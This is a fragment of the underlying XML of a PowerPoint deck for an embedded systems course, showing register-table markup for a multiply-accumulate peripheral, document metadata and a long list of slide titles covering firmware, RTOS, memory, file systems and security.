          <a:off x="609600" y="2971800"/>
          <a:ext cx="8229600" cy="2438400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="750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Default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875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RW/L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Multiplier (MACMLTR):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32-bit number to multiply using multiply and accumulate function. The multiplication is unsigned.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737742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smtClean="0"/>
              <a:t>MAC reg 2: multiplicand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="74781" name="Group 29"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1874533843"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1905000"/>
          <a:ext cx="8229600" cy="4134102"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="75083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30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31:0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RW/L</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Multiplicand (MACMLTD):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32-bit number to multiply using multiply and accumulate function. The multiplication is unsigned.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A write to this register triggers the multiply/accumulate function.</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The multiply result register will be updated in the following clock.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The accumulate result register will be updated in two clocks.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96097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DBE5F1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F81BD"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="366092"/>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42203</TotalTime>
  <Words>18242</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>3608</Paragraphs>
  <Slides>353</Slides>
  <Notes>75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353</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="356" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Equation</vt:lpstr>
      <vt:lpstr>Legal Disclaimer</vt:lpstr>
      <vt:lpstr>Embedded Systems</vt:lpstr>
      <vt:lpstr>Administration</vt:lpstr>
      <vt:lpstr>Exercises</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Embedded Systems - Introduction</vt:lpstr>
      <vt:lpstr>Embedded System - Definition</vt:lpstr>
      <vt:lpstr>Embedded Systems in numbers</vt:lpstr>
      <vt:lpstr>Examples of embedded systems</vt:lpstr>
      <vt:lpstr>Example – a Digital Camera</vt:lpstr>
      <vt:lpstr>Embedded Systems Development – Main Characteristics</vt:lpstr>
      <vt:lpstr>Unique Hardware Environment</vt:lpstr>
      <vt:lpstr>Highly Constrained</vt:lpstr>
      <vt:lpstr>Economic Model</vt:lpstr>
      <vt:lpstr>Closed System</vt:lpstr>
      <vt:lpstr>Soft &lt; Firm &lt; Hard</vt:lpstr>
      <vt:lpstr>Embedded System Languages</vt:lpstr>
      <vt:lpstr>Real-Time Systems</vt:lpstr>
      <vt:lpstr>Wide Range of Expertise</vt:lpstr>
      <vt:lpstr>Embedded Systems Components</vt:lpstr>
      <vt:lpstr>Embedded System Components</vt:lpstr>
      <vt:lpstr>Example – Digital Camera</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Processor</vt:lpstr>
      <vt:lpstr>ARC 600</vt:lpstr>
      <vt:lpstr>ARC 600 Simplified Pipeline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Resolution of Mix 16/32-bit Instructions</vt:lpstr>
      <vt:lpstr>Core Register File</vt:lpstr>
      <vt:lpstr>Example 32-bit Opcode Format</vt:lpstr>
      <vt:lpstr>Example 16-bit Opcode Format</vt:lpstr>
      <vt:lpstr>Major Opcode Map</vt:lpstr>
      <vt:lpstr>Memory Types</vt:lpstr>
      <vt:lpstr>RAM (Random Access Memory)</vt:lpstr>
      <vt:lpstr>ROM (Read Only Memory)</vt:lpstr>
      <vt:lpstr>EEPROM</vt:lpstr>
      <vt:lpstr>Flash</vt:lpstr>
      <vt:lpstr>NOR Flash vs. NAND Flash</vt:lpstr>
      <vt:lpstr>Battery-powered SRAM</vt:lpstr>
      <vt:lpstr>Memory types - summary</vt:lpstr>
      <vt:lpstr>Memory Architectures</vt:lpstr>
      <vt:lpstr>Memory Controller</vt:lpstr>
      <vt:lpstr>Memory Controller – first stop in the address / data bus</vt:lpstr>
      <vt:lpstr>Peripherals</vt:lpstr>
      <vt:lpstr>Peripheral examples</vt:lpstr>
      <vt:lpstr>Peripherals connection to the CPU</vt:lpstr>
      <vt:lpstr>Building Embedded Software</vt:lpstr>
      <vt:lpstr>The Build Process - overview</vt:lpstr>
      <vt:lpstr>The Build Process - Compiling</vt:lpstr>
      <vt:lpstr>The Build Process – Compiling (cont)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>foo.o</vt:lpstr>
      <vt:lpstr>The Build Process – Compiling (cont)</vt:lpstr>
      <vt:lpstr>The Build Process - Linking</vt:lpstr>
      <vt:lpstr>The Build Process – Linking (cont)</vt:lpstr>
      <vt:lpstr>The Build Process – Locating</vt:lpstr>
      <vt:lpstr>Locating example #1</vt:lpstr>
      <vt:lpstr>Locating example #2</vt:lpstr>
      <vt:lpstr>Locating example #3</vt:lpstr>
      <vt:lpstr>Mapping Memory Areas</vt:lpstr>
      <vt:lpstr>Sections - example</vt:lpstr>
      <vt:lpstr>The Build Process – Locating (cont)</vt:lpstr>
      <vt:lpstr>Locating example #1</vt:lpstr>
      <vt:lpstr>Locating example #2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Locating example #2 – ROM code</vt:lpstr>
      <vt:lpstr>Mapping Memory Areas –  another example</vt:lpstr>
      <vt:lpstr>Alternate sections</vt:lpstr>
      <vt:lpstr>Alternate sections  - example</vt:lpstr>
      <vt:lpstr>Locating example #3</vt:lpstr>
      <vt:lpstr>Map file</vt:lpstr>
      <vt:lpstr>Startup Sequence</vt:lpstr>
      <vt:lpstr>Startup Sequence</vt:lpstr>
      <vt:lpstr>Startup Sequence (cont.)</vt:lpstr>
      <vt:lpstr>Startup Sequence – Cont.</vt:lpstr>
      <vt:lpstr>Startup Sequence – Cont.</vt:lpstr>
      <vt:lpstr>Endianness and Alignment</vt:lpstr>
      <vt:lpstr>Endianness</vt:lpstr>
      <vt:lpstr>Mix 16/32-bit Instructions results in middle-endian</vt:lpstr>
      <vt:lpstr>Endianness Problems</vt:lpstr>
      <vt:lpstr>Endianness Problems – Cont.</vt:lpstr>
      <vt:lpstr>Memory Alignment</vt:lpstr>
      <vt:lpstr>Memory Alignment Problems</vt:lpstr>
      <vt:lpstr>Memory Alignment Problems – Cont.</vt:lpstr>
      <vt:lpstr>Memory Packing</vt:lpstr>
      <vt:lpstr>Memory Packing – Cont.</vt:lpstr>
      <vt:lpstr>Memory Packing – Cont.</vt:lpstr>
      <vt:lpstr>Memory Packing – Cont.</vt:lpstr>
      <vt:lpstr>Unaligned pointers</vt:lpstr>
      <vt:lpstr>Aligning buffers</vt:lpstr>
      <vt:lpstr>Hardware / Firmware Interfaces</vt:lpstr>
      <vt:lpstr>Control &amp; Status Registers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example 1 – Multiplier and Accumulator (MAC) offload</vt:lpstr>
      <vt:lpstr>MAC reg 1: multiplier</vt:lpstr>
      <vt:lpstr>MAC reg 2: multiplicand</vt:lpstr>
      <vt:lpstr>MAC reg 3: product</vt:lpstr>
      <vt:lpstr>MAC reg 4: accumulator</vt:lpstr>
      <vt:lpstr>MAC reg 5: status</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Accessing registers – I/O bus (PMIO)</vt:lpstr>
      <vt:lpstr>MAC - code</vt:lpstr>
      <vt:lpstr>MAC – code (cont.)</vt:lpstr>
      <vt:lpstr>Accessing Registers - Memory Mapped I/O</vt:lpstr>
      <vt:lpstr>MMIO example</vt:lpstr>
      <vt:lpstr>Mapping registers to structs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MMIO side effect</vt:lpstr>
      <vt:lpstr>Renaming makes it look different…</vt:lpstr>
      <vt:lpstr>Volatile Keyword</vt:lpstr>
      <vt:lpstr>Volatile – example – test.c</vt:lpstr>
      <vt:lpstr>Volatile – example – test.s</vt:lpstr>
      <vt:lpstr>Another example – why do we need “volatile”</vt:lpstr>
      <vt:lpstr>MMIO vs. PMIO</vt:lpstr>
      <vt:lpstr>Example: security keypad door lock</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Keypad interface</vt:lpstr>
      <vt:lpstr>Aux regs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Interrupts</vt:lpstr>
      <vt:lpstr>Interrupts</vt:lpstr>
      <vt:lpstr>Events that cause interrupts</vt:lpstr>
      <vt:lpstr>The Interrupt Service Routine</vt:lpstr>
      <vt:lpstr>Acknowledging the Interrupt</vt:lpstr>
      <vt:lpstr>ISR</vt:lpstr>
      <vt:lpstr>Read the ICR once!</vt:lpstr>
      <vt:lpstr>Data Sharing between ISR and main program</vt:lpstr>
      <vt:lpstr>Test and Set</vt:lpstr>
      <vt:lpstr>Using Polling vs. Interrupts</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Using Polling vs. Interrupts</vt:lpstr>
      <vt:lpstr>Hardware / Firmware Interfaces – Example</vt:lpstr>
      <vt:lpstr>Example – Blinking LED</vt:lpstr>
      <vt:lpstr>Board Design Doc – Block Diagram</vt:lpstr>
      <vt:lpstr>Board Design Doc – LED spec</vt:lpstr>
      <vt:lpstr>Board Design Doc – Clock spec</vt:lpstr>
      <vt:lpstr>Board Design Doc – Clock spec</vt:lpstr>
      <vt:lpstr>Board Design Doc – Clock spec</vt:lpstr>
      <vt:lpstr>Board Design Doc – Clock spec</vt:lpstr>
      <vt:lpstr>Blinking LED – Main Function</vt:lpstr>
      <vt:lpstr>Blinking LED – LED.c</vt:lpstr>
      <vt:lpstr>Blinking LED – Timer.c</vt:lpstr>
      <vt:lpstr>Blinking LED – Timer.c (cont)</vt:lpstr>
      <vt:lpstr>Direct Memory Access – DMA</vt:lpstr>
      <vt:lpstr>DMA Example – network device</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Device: Firmware flows</vt:lpstr>
      <vt:lpstr>Network Device: Hardware Logic</vt:lpstr>
      <vt:lpstr>DMA “gotcha” – caching</vt:lpstr>
      <vt:lpstr>Bus Masters</vt:lpstr>
      <vt:lpstr>I2C and SMBus</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>I2C controller interface –  option 1: Bit Banging</vt:lpstr>
      <vt:lpstr>I2C controller interface –  option 2: HW does it all</vt:lpstr>
      <vt:lpstr>Serial Peripheral Interface (SPI)</vt:lpstr>
      <vt:lpstr>Device Drivers</vt:lpstr>
      <vt:lpstr>Device Drivers</vt:lpstr>
      <vt:lpstr>Device Driver Tasks</vt:lpstr>
      <vt:lpstr>Dispatching Interrupts From Driver to Application</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Interrupts in Depth</vt:lpstr>
      <vt:lpstr>Interrupt Lines</vt:lpstr>
      <vt:lpstr>Edge vs. Level interrupts</vt:lpstr>
      <vt:lpstr>Edge vs. Level interrupts</vt:lpstr>
      <vt:lpstr>Interrupt Priorities</vt:lpstr>
      <vt:lpstr>Enabling and Disabling interrupts in the processor</vt:lpstr>
      <vt:lpstr>Enabling and Disabling interrupts in the device</vt:lpstr>
      <vt:lpstr>What does the processor do when an interrupt occurs?</vt:lpstr>
      <vt:lpstr>What does ARC605 do when an interrupt occurs?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Interrupt Vector</vt:lpstr>
      <vt:lpstr>The Interrupt Service Routine</vt:lpstr>
      <vt:lpstr>Saving and restoring the processor context</vt:lpstr>
      <vt:lpstr>Returning from an interrupt – ARC605</vt:lpstr>
      <vt:lpstr>ISR - example</vt:lpstr>
      <vt:lpstr>Context Save</vt:lpstr>
      <vt:lpstr>Context Restore</vt:lpstr>
      <vt:lpstr>Shortcut</vt:lpstr>
      <vt:lpstr>Real-time Operating Systems (RTOS)</vt:lpstr>
      <vt:lpstr>What is an OS?</vt:lpstr>
      <vt:lpstr>What is an OS?</vt:lpstr>
      <vt:lpstr>What’s in an OS</vt:lpstr>
      <vt:lpstr>OS Families</vt:lpstr>
      <vt:lpstr>OS Families</vt:lpstr>
      <vt:lpstr>OS Families</vt:lpstr>
      <vt:lpstr>OS Families</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OS Families</vt:lpstr>
      <vt:lpstr>Multitasking</vt:lpstr>
      <vt:lpstr>Scheduler</vt:lpstr>
      <vt:lpstr>Context Switch</vt:lpstr>
      <vt:lpstr>FIFO</vt:lpstr>
      <vt:lpstr>Shortest Job First</vt:lpstr>
      <vt:lpstr>Priority</vt:lpstr>
      <vt:lpstr>Round Robin</vt:lpstr>
      <vt:lpstr>Real-time schedulers</vt:lpstr>
      <vt:lpstr>Task Synchronization</vt:lpstr>
      <vt:lpstr>Mutex</vt:lpstr>
      <vt:lpstr>Implementing a mutex in the OS</vt:lpstr>
      <vt:lpstr>Implementing a mutex in the OS</vt:lpstr>
      <vt:lpstr>Semaphore</vt:lpstr>
      <vt:lpstr>Mutex vs. Semaphore</vt:lpstr>
      <vt:lpstr>Event</vt:lpstr>
      <vt:lpstr>Conditional Variable</vt:lpstr>
      <vt:lpstr>Other Synchronization Mechanisms</vt:lpstr>
      <vt:lpstr>Interrupts</vt:lpstr>
      <vt:lpstr>Watchdog timer and multitasking</vt:lpstr>
      <vt:lpstr>Mars Pathfinder &amp; priority inversion</vt:lpstr>
      <vt:lpstr>Priority Inversion</vt:lpstr>
      <vt:lpstr>Priority Inheritance</vt:lpstr>
      <vt:lpstr>Selection of RTOS</vt:lpstr>
      <vt:lpstr>ThreadX</vt:lpstr>
      <vt:lpstr>Integration with code</vt:lpstr>
      <vt:lpstr>Code Samples</vt:lpstr>
      <vt:lpstr>Blinking LED - ThreadX</vt:lpstr>
      <vt:lpstr>Blinking LED - ThreadX</vt:lpstr>
      <vt:lpstr>Blinking LED – Embedded Linux</vt:lpstr>
      <vt:lpstr>Semaphore - ThreadX</vt:lpstr>
      <vt:lpstr>Semaphore - ThreadX</vt:lpstr>
      <vt:lpstr>Event Flags- ThreadX</vt:lpstr>
      <vt:lpstr>Event Flags- ThreadX</vt:lpstr>
      <vt:lpstr>Interrupt - ThreadX</vt:lpstr>
      <vt:lpstr>Message Q - ThreadX</vt:lpstr>
      <vt:lpstr>Message Q - ThreadX</vt:lpstr>
      <vt:lpstr>Development Environments</vt:lpstr>
      <vt:lpstr>ASIC development cycle</vt:lpstr>
      <vt:lpstr>ASIC development cycle</vt:lpstr>
      <vt:lpstr>FPGA</vt:lpstr>
      <vt:lpstr>FPGA as prototype</vt:lpstr>
      <vt:lpstr>Debugging firmware on hardware</vt:lpstr>
      <vt:lpstr>Board Design</vt:lpstr>
      <vt:lpstr>JTAG</vt:lpstr>
      <vt:lpstr>JTAG debugger</vt:lpstr>
      <vt:lpstr>Software Simulation</vt:lpstr>
      <vt:lpstr>Optimizations</vt:lpstr>
      <vt:lpstr>Optimizing for performance</vt:lpstr>
      <vt:lpstr>Use “#define” / “inline” instead of Functions (I)</vt:lpstr>
      <vt:lpstr>#define is flexible</vt:lpstr>
      <vt:lpstr>Simple Branch Optimization</vt:lpstr>
      <vt:lpstr>Lookup Tables instead of Switch Blocks</vt:lpstr>
      <vt:lpstr>C to Assembly – Do it Yourself</vt:lpstr>
      <vt:lpstr>Register Variables</vt:lpstr>
      <vt:lpstr>Global Variables</vt:lpstr>
      <vt:lpstr>Polling vs Interrupts</vt:lpstr>
      <vt:lpstr>Know your processor</vt:lpstr>
      <vt:lpstr>Know your processor</vt:lpstr>
      <vt:lpstr>Know your processor</vt:lpstr>
      <vt:lpstr>Processor’s Register Width (I)</vt:lpstr>
      <vt:lpstr>Processor’s Register Width (II)</vt:lpstr>
      <vt:lpstr>Processor’s Register Width (III)</vt:lpstr>
      <vt:lpstr>Loop Unrolling</vt:lpstr>
      <vt:lpstr>Loop Unrolling – Duff’s Device</vt:lpstr>
      <vt:lpstr>External Memory Access</vt:lpstr>
      <vt:lpstr>Know your peripherals</vt:lpstr>
      <vt:lpstr>Example – zero 256k of memory with DMA copy engine</vt:lpstr>
      <vt:lpstr>Optimizing for Size</vt:lpstr>
      <vt:lpstr>Reducing Code Size (I)</vt:lpstr>
      <vt:lpstr>Reducing Code Size (II)</vt:lpstr>
      <vt:lpstr>Reducing Data (RAM) Size (I)</vt:lpstr>
      <vt:lpstr>Use of const</vt:lpstr>
      <vt:lpstr>Use of const</vt:lpstr>
      <vt:lpstr>Reducing Data (RAM) Size (II)</vt:lpstr>
      <vt:lpstr>Reducing Data (RAM) Size (III)</vt:lpstr>
      <vt:lpstr>Tradeoffs</vt:lpstr>
      <vt:lpstr>Compiler Optimizations</vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Memory Controller</vt:lpstr>
      <vt:lpstr>Privileged Mode</vt:lpstr>
      <vt:lpstr>System Call</vt:lpstr>
      <vt:lpstr>Memory Protection Unit / Memory Management Unit</vt:lpstr>
      <vt:lpstr>Paging</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Paging - Usages</vt:lpstr>
      <vt:lpstr>Swapping</vt:lpstr>
      <vt:lpstr>Page replacement algorithms</vt:lpstr>
      <vt:lpstr>Segmentation</vt:lpstr>
      <vt:lpstr>Segment Registers</vt:lpstr>
      <vt:lpstr>Segment Descriptor Format</vt:lpstr>
      <vt:lpstr>   Big Picture</vt:lpstr>
      <vt:lpstr>Processes</vt:lpstr>
      <vt:lpstr>Inter-process Communication</vt:lpstr>
      <vt:lpstr>Process Switch</vt:lpstr>
      <vt:lpstr>Multithreading + Multiprocessing</vt:lpstr>
      <vt:lpstr>IO-MMU</vt:lpstr>
      <vt:lpstr>File Systems</vt:lpstr>
      <vt:lpstr>File System</vt:lpstr>
      <vt:lpstr>Plug-in Drivers and OS Services</vt:lpstr>
      <vt:lpstr>POSIX File System</vt:lpstr>
      <vt:lpstr>Wear Leveling</vt:lpstr>
      <vt:lpstr>Naïve approach</vt:lpstr>
      <vt:lpstr>Dynamic vs. Static</vt:lpstr>
      <vt:lpstr>Flash Translation Layer</vt:lpstr>
      <vt:lpstr>FTL</vt:lpstr>
      <vt:lpstr>FTL</vt:lpstr>
      <vt:lpstr>FTL</vt:lpstr>
      <vt:lpstr>FTL</vt:lpstr>
      <vt:lpstr>Log-based file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JFFS</vt:lpstr>
      <vt:lpstr>Wear-out prevention</vt:lpstr>
      <vt:lpstr>Wear-out prevention</vt:lpstr>
      <vt:lpstr>Wear-out prevention</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>TVC methodology</vt:lpstr>
      <vt:lpstr>Example:  Home Router</vt:lpstr>
      <vt:lpstr>Example: Game Console</vt:lpstr>
      <vt:lpstr>Security Requirements</vt:lpstr>
      <vt:lpstr>Security Requirements Cont.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security for embedded systems</vt:lpstr>
      <vt:lpstr>Security for Embedded Systems</vt:lpstr>
      <vt:lpstr>Embedded systems – security breach consequences</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>Code Signing</vt:lpstr>
      <vt:lpstr>Code Verification</vt:lpstr>
      <vt:lpstr>Hardening Code Execution</vt:lpstr>
      <vt:lpstr>Debug hooks</vt:lpstr>
      <vt:lpstr>Physical attacks</vt:lpstr>
      <vt:lpstr>Intel® vPro Technology</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Peripheral Devices</vt:lpstr>
      <vt:lpstr>Serial Emulation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Operating System</vt:lpstr>
      <vt:lpstr>Build environment</vt:lpstr>
      <vt:lpstr>Development environments</vt:lpstr>
      <vt:lpstr>Security Mechanisms</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Systems (67744)</dc:title>
  <dc:creator>lomer</dc:creator>
  <cp:lastModifiedBy>Levy, Omer</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-01-13T12:00:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-04-24T06:19:26Z</dcterms:modified>
</cp:coreProperties>
</file>